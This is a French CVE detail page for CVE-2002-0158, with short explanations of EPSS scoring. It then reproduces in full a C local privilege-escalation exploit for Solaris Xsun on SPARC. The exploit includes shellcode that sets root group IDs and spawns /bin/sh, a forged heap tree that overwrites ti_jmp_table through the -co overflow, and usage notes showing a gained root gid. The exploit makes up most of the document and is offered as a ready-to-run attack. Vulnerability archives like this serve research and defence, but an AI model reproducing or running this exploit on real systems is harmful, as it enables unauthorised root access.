CVE-2002-0158 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

// source: https://www.securityfocus.com/bid/4408/info Solaris is the freely available Unix operating system distributed by Sun Microsystems. It may be possible for a local user to gain elevated privileges. When Xsun is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges. /* Xsun(sparc) local exploit by gloomy (gloomy@root66.org) & eSDee (esdee@netric.org) ------------------------------------------------------------------ Xsun is a Solaris server for X version 11. This program contains an option that is not really secure nowadays :). The option is used to determine the color database file. And yeah, indeed, you guessed it already, it contains a heap overflow. When we were busy writing this exploit within a multi display screen, we discovered some weird "unable-to-write-over-stackframe" problems. We tried everything to just write a few bytes over a saved program counter, but unfortunatly it was not possible on the current machine we were using. Then eSDee came up with something news. In the middle of the night a loud "yippeaaaaaa!" came out the bedroom of mister Es. He discovered a little section just below the GOT. It didn't contain \0 bytes and it was writeable. It's called the ti_jmp_table. I'm sure eSDee will write some papers about it soon. Gloomy was busy writing a shellcode that re-opens the STDIN. He found out that he just could open /dev/tty and then duplicate the STDERR filedescriptor, so the important descriptors were back again. USAGE: ./Xsun-expl [retloc] [ret] Example: bash$ gcc -o Xsun-expl Xsun-expl.c -Wall -Werror bash$ ./Xsun-expl Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..... ... bash$ id uid=500(user) gid=0(root) Greets and kisses: #netric - www.netric.org #root66 - www.root66.org mostlyharmless - www.mostly-harmless.nl [soon] dB_____ - fijne broer van gloom-ei! :) squezel - lekker ventje ben jij. More information available at: http://online.securityfocus.com/advisories/40 09 [ps. wat een lompe text] */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define PATH "/usr/openwin/bin/Xsun" #define DISPLAY ":1" #define SIZE 5128 #define RET 0xffbef7bc #define RETLOC 0xfecbea30 /* <ti_jmp_table+4> (a pointer to _retu rn_zero) */ #define DUMMY 0xac1db0ef struct WORD { long element; long dummy; }; struct TREE { struct WORD t_s; /* size of this element */ struct WORD t_p; /* parent node */ struct WORD t_l; /* left child */ struct WORD t_r; /* right child */ struct WORD t_n; /* next in link list */ struct WORD t_d; /* dummy to reserve space for self-pointer */ }; char shellcode[]= /* setregid(0,0); setting root permission s open("/dev/tty", RD_ONLY); re-open STDIN dup(2); duplicate STDOUT to STD ERR execve("/bin//sh", &argv[0], NULL); start the shell exit(); exit */ "\x90\x1d\x80\x16" // xor %l6, %l6, %o0 "\x92\x1d\x80\x16" // xor %l6, %l6, %o1 "\x82\x18\x40\x01" // xor %g1, %g1, %g1 "\x82\x10\x20\xcb" // mov 0x2e, %g1 "\x91\xd0\x20\x08" // ta 8 [setreg id(0,0)] "\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0 "\xa0\x14\x21\x76" // or %l0, 0x176, %l0 "\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1 "\xa2\x14\x60\x79" // or %l1, 0x79, %l1 "\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ] "\x90\x23\xa0\x08" // sub %sp, 8, %o0 "\x92\x1b\x80\x0e" // xor %sp, %sp, %o1 "\x82\x10\x20\x05" // mov 0x05, %g1 "\x91\xd0\x20\x08" // ta 8 [open(" /dev/tty",RD_ONLY)] "\x90\x10\x20\x02" // mov 0x02, %o0 "\x82\x10\x20\x29" // mov 0x29, %g1 "\x91\xd0\x20\x08" // ta 8 [dup(2) ] "\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0 "\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0 "\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1 "\xa2\x14\x63\x68" // or %l1, 0x368, %l1 "\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ] "\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ] "\x90\x23\xa0\x10" // sub %sp, 0x10, %o0 "\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ] "\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ] "\x92\x23\xa0\x18" // sub %sp, 0x18, %o1 "\x94\x22\x80\x0a" // sub %o2, %o2, %o2 "\x82\x18\x40\x01" // xor %g1, %g1, %g1 "\x82\x10\x20\x3b" // mov 0x3b, %g1 "\x91\xd0\x20\x08" // ta 8 [execve ("/bin/sh","/bin/sh",NULL)] "\x82\x10\x20\x01" // mov 0x01, %g1 "\x91\xd0\x20\x08" // ta 8 [exit(? )] "\x10\xbf\xff\xdf" // b shellcode "\x90\x1d\x80\x16"; // or %o1, %o1, %o1 int main(int argc, char *argv[]) { struct TREE faketree; // our friendly little tree char buffer[SIZE+sizeof(faketree)+1]; unsigned int ret = RET; unsigned int retloc = RETLOC; unsigned int dummy = DUMMY; if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16); if (argc > 2) ret = strtoul(argv[2], &argv[2], 16); faketree.t_s.element = 0xfffffff0; faketree.t_s.dummy = dummy; faketree.t_n.element = retloc - 8; faketree.t_n.dummy = dummy; faketree.t_l.element = 0xffffffff; faketree.t_l.dummy = dummy; faketree.t_r.element = dummy; faketree.t_r.dummy = dummy; faketree.t_p.element = ret; faketree.t_p.dummy = dummy; faketree.t_d.element = dummy; faketree.t_d.dummy = dummy; memset(buffer, 0x41, sizeof(buffer)); memcpy(buffer + 3999 - (strlen(shellcode) - 8), shellcode, strlen(shell code)); memcpy(buffer + SIZE, &faketree, sizeof(faketree)); buffer[SIZE + sizeof(faketree)] = 0x0; fprintf(stdout, "Retloc = 0x%08x\n" "Ret = 0x%08x\n", retloc, ret); execl(PATH, "Xsun", "-co", buffer, DISPLAY, NULL); return 0; } /* [eof] */